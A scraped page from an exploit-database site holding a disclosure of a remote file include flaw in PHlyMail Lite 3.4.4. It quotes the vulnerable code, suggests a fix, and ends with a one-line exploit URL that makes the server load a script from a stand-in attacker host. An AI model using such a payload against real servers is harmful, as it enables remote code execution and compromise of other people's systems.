0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability
====================================================================== PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability ====================================================================== /* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: PHlyMail Lite v. 3.4.4 (Build 3.04.04) - [Script site: http://phlymail.de/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart ;-) - Ema: Leito, Adam, DeathSpeed, Drzewko, pepi - !@ Przyjazni nie da sie zamienic na marne kozysci @! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ /* +++++++++++++++++++++START+++++++++++++++++++++++ vulnerable code => handlers/email/mod.listmail.php line 12-25: .... $use_preview = (isset($_PM_['core']['folders_usepreview']) && $_PM_['core']['folders_usepreview']) ? true : false; $ordfields = array ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority' ,'attachments', 'meta_read', 'meta_type', 'meta_colour' ); require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php'); require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php'); // We changed the folder, got to reset the page number to 0 if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder']) && $_REQUEST['workfolder'] != $_SESSION['workfolder']) { $_SESSION['WPs_pagenum'] = 0; } .... +++++++++++++++++++++++++++++++++++++++++++++++++ */ /* +++++++++++++++++++++FIX+++++++++++++++++++++++++ handlers/email/mod.listmail.php line 12-25: Add Line1: .... if (!defined('_IN_PHM_')) die(); .... $use_preview = (isset($_PM_['core']['folders_usepreview']) && $_PM_['core']['folders_usepreview']) ? true : false; $ordfields = array ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority' ,'attachments', 'meta_read', 'meta_type', 'meta_colour' ); require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php'); require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php'); // We changed the folder, got to reset the page number to 0 if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder']) && $_REQUEST['workfolder'] != $_SESSION['workfolder']) { $_SESSION['WPs_pagenum'] = 0; } .... ++++++++++++++++++++THE+END++++++++++++++++++++++ */ #Exploit: http://www.site.com/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt] # 0day.today [2024-07-07] #